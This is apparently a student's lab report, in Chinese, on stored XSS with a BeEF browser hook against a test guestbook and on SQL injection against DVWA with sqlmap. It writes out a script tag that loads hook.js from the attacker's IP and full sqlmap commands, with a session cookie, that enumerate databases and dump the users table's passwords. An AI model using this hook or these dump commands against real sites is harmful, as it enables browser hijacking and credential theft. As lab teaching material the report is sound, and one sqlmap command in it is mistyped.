实验三(XSS和SQL注入)

发布时间 2024-01-02 21:48:34作者: 路肆ly

 

 

1. 实验目的和要求

了解什么是XSS;了解XSS攻击实施,理解防御XSS攻击的方法;了解SQL注入的基本原理;掌握PHP脚本访问MySQL数据库的基本方法;掌握程序设计中避免出现SQL注入漏洞的基本方法;掌握网站配置。

系统环境:Kali Linux 2Windows Server

网络环境:交换网络结构

实验工具: BeefAWVS(Acunetix Web Vulnarability Scanner);SqlMAPDVWA

2. 实验步骤

XSS部分:利用Beef劫持被攻击者客户端浏览器。

实验环境搭建。

角色:留言簿网站。存在XSS漏洞;(IISApacheguestbook搭建)

攻击者:Kali(使用beEF生成恶意代码,并通过留言方式提交到留言簿网站);

被攻击者:访问留言簿网站,浏览器被劫持。

1、利用AWVS扫描留言簿网站(安装见参考文档0.AWVS安装与使用.docx),发现其存在XSS漏洞,截图。

(1)首先将实验三文件夹中的GuestBook文件夹复制到win2003server虚拟机(在此之前要先安装VMtools),然后找到IIS(路径为 开始->程序->管理工具->IIS),在IIS里添加网站,设置好IP、权限和端口等(见上面参考链接)之后,要在Web服务扩展中将 Active Server Pages 设置为允许(不一定是默认允许的)。进入网站。

(2)将恶意代码写进去并评论。

(3)AWVS扫描留言簿网站,发现漏洞。

2、Kali使用beef生成恶意代码,截图。

3、访问http://留言簿网站/message.asp;将以下恶意代码写入网站留言板,

<script src="http://KaliIP地址:3000/hook.js"></script>,截图。 

 

4、管理员登录login.htm,账号密码均为admin,审核用户留言。只要客户端访问这个服务器的留言板,客户端浏览器就会被劫持,指定被劫持网站为学校主页,将你在beff中的配置截图。

1首先我们先选择被劫持的的浏览器,然后转到Commands选项卡,再选择重定向向浏览器,在右边的地址栏中将地址换成我们所要替换的地址https://www.bilibili.com/ 

(2)然后被攻击者就会调转到我们指定的网址界面。

 

5、回答问题:实验中XSS攻击属于哪种类型?

实验中的属于存储型XXS攻击

 

SQL注入部分:DVWA+SQLmap+Mysql注入实

实验环境搭建。启动Metasploitable2虚拟机。

1、注入点发现。首先肯定是要判断是否有注入漏洞。

在输入框输入1,返回

返回正常;

再次输入1',报错,返回

You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1''' at line 1

此时可以断定有SQL注入漏洞,

   1)先判断是否有注入漏洞,在dvwa(搭建好Metasplotiable 2之后获取ip,在浏览器上访问ip,即可找到)上先将DVWA SecurityScript Security等级改为low 

2我们在输入框中输入1,返回正常。

(3)再继续输入1’,报错,此时可以断定有SQL注入漏洞

下面利用SQLMap进行注入攻击。将DVWA安全级别设置为最低;

2、枚举当前使用的数据库名称和用户名。

你输入的命令:

 (1)先获取 cookie中的 PHPSESSID:在Firefoxgoogle)中按F12inspect--->storage,找到cookie,即可查看cookie。 

2)所以输入的命令:

数据库:

sqlmap -u "http://192.168.223.135/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=6726763d1acaac28d24ce2fa3496ecde" --current-db

用户名:

sqlmap -u "http://192.168.223.135/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=6726763d1acaac28d24ce2fa3496ecde" --current-user        

Sqlmap输出截图。

1数据库为:dvwa 

(2)查询用户名:root@% 

3、枚举数据库用户名和密码 

你输入的命令:

        sqlmap -u "http://192.168.223.135/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=6726763d1acaac28d24ce2fa3496ecde" -D dvwa -T --uers --password                                    

Sqlmap输出截图。 

4、枚举数据库

--dbs:枚举当前数据库

你输入的命令:

      sqlmap -u "http://192.168.223.135/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=6726763d1acaac28d24ce2fa3496ecde" -dbs                                      

Sqlmap输出截图。 

5、枚举数据库和指定数据库的数据表

 -D 数据库名:指定数据库

--tables:枚举指定数据库的所有表

你输入的命令:

sqlmap -u "http://192.168.223.135/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=6726763d1acaac28d24ce2fa3496ecde" -D dvwa --tables                                    

Sqlmap输出截图。 

 

6、获取指定数据库和表中所有列的信息

-D:指定的数据库

-T:指定数据库中的数据表

--columns:获取列的信息

你输入的命令:

sqlmap -u "http://192.168.223.135/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=6726763d1acaac28d24ce2fa3496ecde" -D dvwa -T users --columns                                            

Sqlmap输出截图。 

7、枚举指定数据表中的所有用户名与密码,down到本地。

-C:枚举数据表中的列

--dump:存储数据表项

你输入的命令:

        sqlmap -u "http://192.168.223.135/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=6726763d1acaac28d24ce2fa3496ecde" -D dvwa -T users -C user,password -dump                                   

Sqlmap输出截图。 

查看down到本地的用户名与密码,截图。(提示带.的文件夹为隐藏,在图形命令下,用文件浏览器打开文件夹,按下ctrl+h组合键可显示隐藏文件合文件夹,再按一次取消显示。) 

3. 实验小结

1.在搭建好网站的时候遇到页面无法打开的问题,后面经过多方原因思考发现是Web服务扩展中Active Server Pages 没有设置为允许。

2.在留言簿评论恶意代码时没有注意格式的问题,导致没有成功放入恶意代码,要多加细心。

3.在本次实验的过程中学习到了什么是XSS攻击、XSS攻击的类型、对AWVS的基本使用有了自己的认识和理、了解了什么是SQL注入攻击、学会了一些简单的XSS攻击和SQL注入攻击